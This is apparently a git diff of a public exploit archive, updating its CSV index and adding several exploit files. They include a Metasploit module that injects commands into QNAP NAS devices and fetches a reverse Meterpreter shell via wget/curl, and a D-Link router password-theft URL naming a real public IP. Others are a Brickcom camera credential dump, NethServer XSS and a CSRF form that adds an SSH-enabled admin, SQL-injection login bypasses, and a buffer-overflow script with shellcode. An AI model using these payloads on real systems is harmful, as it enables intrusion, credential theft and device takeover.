36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery",2012-02-13,MustLive,hardware,remote,0
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow (Metasploit)",2015-04-21,Metasploit,windows,remote,0
36809,platforms/php/remote/36809.rb,"WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
36810,platforms/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
@ -15252,7 +15253,7 @@ id,file,description,date,author,platform,type,port
37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote,0
37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote,0
37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0
@ -15694,6 +15695,7 @@ id,file,description,date,author,platform,type,port
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
@ -27589,7 +27591,7 @@ id,file,description,date,author,platform,type,port
24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0
24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0
24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0
24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0
24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
@ -27602,7 +27604,7 @@ id,file,description,date,author,platform,type,port
24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0
24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
@ -27847,7 +27849,7 @@ id,file,description,date,author,platform,type,port
25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0
25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0
24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0
24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0
24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0
24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0
@ -32579,7 +32581,7 @@ id,file,description,date,author,platform,type,port
31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081
31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378
31768,platforms/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80
31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0
@ -32977,7 +32979,7 @@ id,file,description,date,author,platform,type,port
32374,platforms/ios/webapps/32374.txt,"Wireless Drive 1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps,0
32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0
32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0
32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",php,webapps,0
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
@ -38363,3 +38365,11 @@ id,file,description,date,author,platform,type,port
42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0
42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0
42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0
42581,platforms/hardware/webapps/42581.txt,"D-Link DIR-600 - Authentication Bypass",2017-08-29,"Jithin D Kurup",hardware,webapps,0
42582,platforms/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
42583,platforms/php/webapps/42583.txt,"PHP Appointment Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,117 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP Transcode Server Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command injection
vulnerability in QNAP NAS devices. The transcoding server listens
on port 9251 by default and is vulnerable to command injection
using the 'rmfile' command.
This module was tested successfully on a QNAP TS-431 with
firmware version 4.3.3.0262 (20170727).
},
'Author' =>
[
'Zenofex', # Initial vulnerability discovery and PoC
'0x00string', # Initial vulnerability discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' =>
[
[ 'URL', 'https://www.exploitee.rs/index.php/QNAP_TS-131' ],
[ 'URL', 'http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm' ]
],
'DisclosureDate' => 'Aug 6 2017',
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
},
'Targets' => [['Automatic', {}]],
'CmdStagerFlavor' => %w{wget curl},
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9251),
OptInt.new('DELAY', [true, 'How long to wait for the device to download the payload', 30])
])
deregister_options 'cmdstager::decoder'
end
def check
vprint_status 'Connecting to transcode server...'
connect
sock.put "\x01\x00\x00\x00"
res = sock.get_once
if res.blank?
vprint_status 'No reply from server'
return CheckCode::Safe
end
vprint_status "Received response: #{res}"
return CheckCode::Detected if res.to_s =~ /client's request is accepted/
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error 'Connection failed'
return CheckCode::Unknown
ensure
disconnect
end
def execute_command(cmd, opts)
# Filtered characters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %
# Execute each command seperately
cmd.split(';').each do |c|
connect
vprint_status "Executing command: #{c}"
# Replace spaces with tabs
c.tr! ' ', "\t"
sock.put "\x01\x00\x00\x00/|#{c}|\x00"
res = sock.get_once
unless res.to_s =~ /client's request is accepted/
print_status 'Unexpected reply'
break
end
print_status "Sent command successfully (#{c.length} bytes)"
disconnect
if c =~ /^(curl|wget)/
print_status "Waiting for the device to download the payload (#{datastore['DELAY']} seconds)..."
Rex.sleep datastore['DELAY']
end
end
rescue ::Rex::ConnectionError
fail_with Failure::Unreachable, 'Failed to connect to the transcode server'
ensure
disconnect
end
def exploit
vprint_status 'Connecting to transcode server...'
execute_cmdstager linemax: 400
end
end

View file

@ -0,0 +1,53 @@
# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
# Date: 29-08-2017
# Exploit Author: Jithin D Kurup
# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
# Vendor : www.dlink.com
# Version: Hardware version: B1
Firmware version: 2.01
# Tested on:All Platforms
1) Description
After Successfully Connected to D-Link DIR-600
Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's
Admin Panel Just by adding a simple payload into URL.
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack,
as demonstrated by discovering the admin password.
Its More Dangerous when your Router has a public IP with remote login
enabled.
IN MY CASE,
Tested Router IP : http://190.164.170.249
Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ
2) Proof of Concept
Step 1: Go to
Router Login Page : http://190.164.170.249:8080
Step 2:
Add the payload to URL.
Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc.
---------------Greetz----------------
+++++++++++ www.0seccon.com ++++++++++++
Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith

View file

@ -0,0 +1,117 @@
1. Advisory Information
========================================
Title:
Brickcom IP-Camera Remote Credentials and Settings Disclosure
Vendor Homepage:
http://www.brickcom.com
Tested on Camera types:
WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af
Remotely Exploitable:
Yes
Vulnerability:
Username / Password / Settings Disclosure (Critical)
Shodan Dork:
title:"Brickcom"
Date:
14/12/2016
Authors:
Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar)
Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio-
lizaso-9ab73359)
Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston-
emanuel-rivadero-858b9ba)
2. CREDIT
========================================
This vulnerability was identified during penetration test and Research by
Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero.
3. Description
========================================
Brickom Cameras allow a low-privilege user to disclose every configuration
in the NVRAM, including credentials in clear text, remotely by making a
simple requests. This vulnerability, coupled with the fact that there are
two default users with known passwords which are rarely modified, allows an
attacker to disclose the admin password and latter every config.
The most Critical API call is users.cgi?action=getUsers, which provides
every user credential. Many other API calls to get information for the WIFI
password or FTP credentials, even the whole configuration, are affected
depending on the camera model.
On the hardware side, the UART console of some models (example: WCB-040Af,
with baudrate 38400) is exposed in the PCB and after soldering the
corresponding pins and connecting, the resulting shell has root access. A
simple NVSHOW command will list every config available in clear text,
including credentials.
4. Proof-of-Concept:
========================================
Using the following GET request:
curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v
Request:
----------
> GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1
> Authorization: Basic <BASE64 user:pass>
> User-Agent: curl/7.35.0
> Host: <IP>:<PORT>
> Accept: */*
>
Response:
----------
< HTTP/1.1 200 Ok
< Server: mini_httpd
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: 0
< Content-Type: text/html
< Connection: close
<
size=3
User1.index=0
User1.username=admin
User1.password=admin
User1.privilege=1
User2.index=1
User2.username=viewer
User2.password=viewer
User2.privilege=0
User3.index=3
User3.username=rviewer
User3.password=rviewer
User3.privilege=2
5. SOLUTION
========================================
The vendor has been contacted and the firmware was updated. See disclosure
in:
https://www.brickcom.com/news/productCERT_security_advisorie.php

View file

@ -0,0 +1,60 @@
NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability
Vendor: NethServer.org
Product web page: https://www.nethserver.org
Affected version: 7.3.1611-u1-x86_64
Summary: NethServer is an operating system for the Linux enthusiast,
designed for small offices and medium enterprises. It's simple, secure
and flexible.
Desc: NethServer suffers from an authenticated stored XSS vulnerability.
Input passed to the 'BackupConfig[Upload][Description]' POST parameter is
not properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
CentOS Linux 7.3.1611 (Core)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5432
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5432.php
16.08.2017
--
PoC request:
POST /en-US/BackupConfig/Upload.json HTTP/1.1
Host: 172.19.0.195:980
Connection: close
Content-Length: 15762
Accept: */*
Origin: https://172.19.0.195:980
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
Referer: https://172.19.0.195:980/en-US/BackupConfig
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2
------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
Content-Type: application/x-xz
[xz content omitted]
------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"
<script>confirm(017)</script>
------WebKitFormBoundary8FfEu2Tn6fUOnT80--

View file

@ -0,0 +1,58 @@
<!--
NethServer 7.3.1611 (create.json) CSRF Create User And Enable SSH Access
Vendor: NethServer.org
Product web page: https://www.nethserver.org
Affected version: 7.3.1611-u1-x86_64
Summary: NethServer is an operating system for the Linux
enthusiast, designed for small offices and medium enterprises.
It's simple, secure and flexible.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
CentOS Linux 7.3.1611 (Core)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5433
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5433.php
16.08.2017
-->
HTML Decoded PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://172.19.0.195:980/en-US/Account/User/create.json" method="POST">
<input type="hidden" name="Account[User][create][username]" value="Blabla" />
<input type="hidden" name="Account[User][create][gecos]" value="Test1" />
<input type="hidden" name="Account[User][create][groups]" value="" />
<input type="hidden" name="Account[User][create][groups][1]" value="admin@zsl.lsz" />
<input type="hidden" name="Account[User][create][expires]" value="no" />
<input type="hidden" name="Account[User][create][shell]" value="/usr/libexec/openssh/sftp-server" />
<input type="hidden" name="Account[User][create][shell]" value="/bin/bash" />
<input type="hidden" name="Account[User][create][setPassword]" value="disabled" />
<input type="hidden" name="Account[User][create][setPassword]" value="enabled" />
<input type="hidden" name="Account[User][create][newPassword]" value="gi3fme$heLL!" />
<input type="hidden" name="Account[User][create][confirmNewPassword]" value="gi3fme$heLL!" />
<input type="hidden" name="Account[User][create][Submit]" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

View file

@ -1,7 +1,8 @@
/*
* This is simple local exploit (Proof of Concept?) for local bug in ProFTPd
* not in default options (must be configured with option --enable-ctrls).
* Bug exist in function pr_ctrls_connect() in file "src/ctrls.c", look:
* Bug exist in func
tion pr_ctrls_connect() in file "src/ctrls.c", look:
*
* "src/ctrls.c"
* int pr_ctrls_connect(const char *socket_file) {

46
platforms/php/webapps/42582.txt Executable file
View file

@ -0,0 +1,46 @@
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<!--
# Exploit Title: Car or Cab Booking Script - SQL injection login bypass
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 28.08.2017
# software link : http://www.phpscriptsmall.com/product/cab-booking-script/
# Version: 3.04
# Category: Webapps
# Tested on: windows64bit / mozila firefox
#
#
--!>
# ========================================================
#
#
# Car or Cab Booking Script - SQL injection login bypass
#
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school
#
# Proof of Concept : -
#
# http://localhost/taxibooking/login.php [ set username and password ] to >> admin' or 1=1 -- -
# you must choose the check box as current and existing user
#
#
#
#
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

42
platforms/php/webapps/42583.txt Executable file
View file

@ -0,0 +1,42 @@
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<!--
# Exploit Title: PHP Appointment Booking Script - injection login bypass
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 28.08.2017
# software link : http://www.phpscriptsmall.com/product/php-appointment-booking-script/
# Version: 3.04
# Category: Webapps
# Tested on: windows64bit / mozila firefox
#
#
--!>
# ========================================================
#
#
#
#
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin
#
# Proof of Concept : -
#
# http://localhost/appointment/admin_login.php [ set username and password ] to >> admin' or 1=1 -- -
#
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

53
platforms/php/webapps/42584.txt Executable file
View file

@ -0,0 +1,53 @@
-----------------------------------------------------------------------------------
|<!--
# Exploit Title: User Login and Management PHP Script - multiple vulnerabilities
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 29.08.2017
# software link : https://www.codester.com/items/469/user-login-and-management-php-script
# demo : http://froiden.cloudapp.net/LoginDashboard/index.php
# Version: 3.04
# Category: Webapps
# Tested on: windows64bit / mozila firefox
#
#
|--!>
|----------------------------------------------------------------------------------
1) admin dashboard authentication bypass
Description : An Attackers are able to completely compromise the web application built upon
the user login and management php script as they can gain access to the admin panel and
manage other users as an admin without authentication!
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php
Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the application and users , including add admin user .. etc
|----------------------------------------------------------------------------------
2) account takeover - cross side request forgery
Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password
> exploitation <
<html>
<body>
<form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST">
<script type="text/javascript">document.csrf_form.submit();</script>
</body>
</html>
|-----------------------------------------EOF-----------------------------------------

30
platforms/php/webapps/42585.txt Executable file
View file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: PHP Video Battle Script 1.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://www.rocky.nu/
# Software Link: http://www.rocky.nu/product/php-video-battle/
# Demo: http://videobattle.rocky.nu/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/[SQL].html
#
# -1'+uNiOn+SeleCt++0x31,0x32,0x33,0x34,0x35,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x37+--+--+-.html
#
# http://localhost/[PATH]/videobattle.html?vote=[SQL]
# http://localhost/[PATH]/videobattle.html?draw=[SQL]
#
# Etc..
# # # # #

View file

@ -0,0 +1,59 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH)
# Date: 28-08-2017
# Exploit Author: Kishan Sharma
# Email : thekishansharma@gmail.com
# Vulnerable Software: Easy Vedio to PSP Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.6.20
# Software Link: http://www.divxtodvd.net/easy_video_to_psp.exe
# Tested On: Windows 7 x64
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of test.txt
#
##############################################################################
buffer = "\x41" * 1008 #Junk
nSEH = "\xeb\x10\x90\x90" #Short Jump
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16 #Nops
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("test.txt", "w")
f.write(data)
f.close()